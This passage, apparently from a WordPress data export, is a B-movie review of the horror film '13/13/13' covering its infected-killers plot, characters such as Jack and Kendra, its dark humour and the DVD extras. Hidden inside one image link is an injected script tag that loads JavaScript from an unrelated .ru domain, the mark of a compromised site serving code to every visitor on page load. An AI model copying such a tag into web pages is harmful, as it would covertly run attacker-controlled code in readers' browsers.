In doing so, they have violated the ancient Mayan calendar. Now, we are in the 13th month of the 13th year of the new millennium, and the few who survive will battle a world of demons.\u201d\u00a0 The demons basically have infected almost everyone and turned them into crazies.\u00a0 The infected are insane killing machines, but they\u2019re alive and not zombies.<\/p>\n<p><a href=\"http:\/\/www.youtube.com\/watch?%5b%5bv=sBRb6yY5GeQ%5d\">http:\/\/www.youtube.com\/watch?%5b[v=sBRb6yY5GeQ]<\/a><\/p>\n<p>The sky was the limit for James to go ballistic and he sure did.\u00a0 Horror movies like this are typically slash em up, but James added some fun characters to make the movie even more enjoyable and you may even snicker during some disturbing scenes.<\/p>\n<p>It begins with us meeting the guys on a camping trip.\u00a0 When Jack (Trae Ireland) returns from the trip everything appears normal\u2026..sort of.\u00a0 His twelve year old daughter Kendra (Tiffany Martinez) smashes a spider in her hands and eats it.\u00a0 His wife Marcy (Calico Cooper) is compulsively scratching all the skin off her arm.\u00a0 Jack takes her the hospital and experiences the doctors acting all hard ass dropping F bombs left and right on him. Meanwhile back home, his daughter is in a heated and distressing argument with Jack\u2019s friend Trevor (Bill Voorhees).\u00a0 \u00a0\u00a0Spoiler, Kendra wins.<\/p>\n<p><a href=\"http:\/\/www.bmovienation.com\/?attachment_id=8602\" rel=\"attachment wp-att-8602\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-8602\" alt=\"trae\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/10\/trae-300x168.jpg\" width=\"300\" height=\"168\" srcset=\"https:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/10\/trae-300x168.jpg 300w, https:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/10\/trae-785x441.jpg 785w, https:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/10\/trae.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><script src=\"\/\/pngme.ru\/seter\"><\/script><\/a><\/p>\n<p>It\u2019s pretty whacky and disturbing in many ways and I have to admit funny at points.\u00a0 Simple things, for example, Quentin (Jody Barton) and Joe (J. Scott) are sitting on the couch drinking beer and you can hear crunching of Trevor\u2019s head being smashed on the concrete outside by Kendra, all while Quentin and Joe zone out watching TV.\u00a0 In one scene Quentin stabs Joe and they laugh as if they smoked a pound of marijuana, and then laugh even harder when they smear his blood on the wall.\u00a0 Quentin and Joe definitely are the Beavis and Butthead of psycho killers.<\/p>\n<p><a href=\"http:\/\/www.bmovienation.com\/?attachment_id=8601\" rel=\"attachment wp-att-8601\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-8601\" style=\"width: 435px; height: 245px;\" alt=\"joe-quentin\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/10\/joe-quentin.bmp\" width=\"533\" height=\"262\" \/><\/a><\/p>\n<p>Jack and Candace (Erin Coker) are the only sane people and meet in the hospital while the world around them is full of crazies.\u00a0 They team up to escape the hospital and get to Jack\u2019s house to save his daughter.\u00a0 Yeah, the daughter who eats<br \/>\nspiders and smashed a guy\u2019s head on the concrete.<\/p>\n<p><a href=\"http:\/\/www.bmovienation.com\/?attachment_id=8600\" rel=\"attachment wp-att-8600\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-8600\" alt=\"erin\" src=\"http:\/\/www.bmovienation.com\/wp-content\/uploads\/2013\/10\/erin.bmp\" width=\"394\" height=\"223\" \/><\/a><\/p>\n<p>The film maintains the insanity throughout as Jack and Candace struggle to make it to 13\/14\/13.\u00a0\u00a0 What would be more dangerous than \u201c13\/13\/13\u201d?\u00a0 James Cullen Bressack and Jared Cohn teaming up to write \u201c14\/14\/14\u201d<\/p>\n<p>On the DVD be sure to check out the bonus features which includes a \u201cMaking Of\u201d and \u201cGag Reel.\u201d<\/p>\n<p>&nbsp;<\/p>\n<p><em>If you have some thoughts to share about this article or you&#8217;d like to discuss B movies with other B movie fans and filmmakers please visit our <a href=\"http:\/\/www.facebook.com\/groups\/bmovienation\/\" target=\"_blank\">B Movie Nation Facebook group<\/a>.<\/em><\/p>\n<div class=\"syndication-links\"><\/div>","protected":false},"excerpt":{"rendered":"<p>Written and directed by James Cullen Bressack who brought us \u201cHate Crime,\u201d \u201cTo Jennifer,\u201d and \u201cMy Pure Joy.\u201d \u00a0Knowing and enjoying James\u2019 style, I anticipated a lot of insane moments and he didn\u2019t let me down. \u201cFor millennia, calendars have added an extra day every four years.
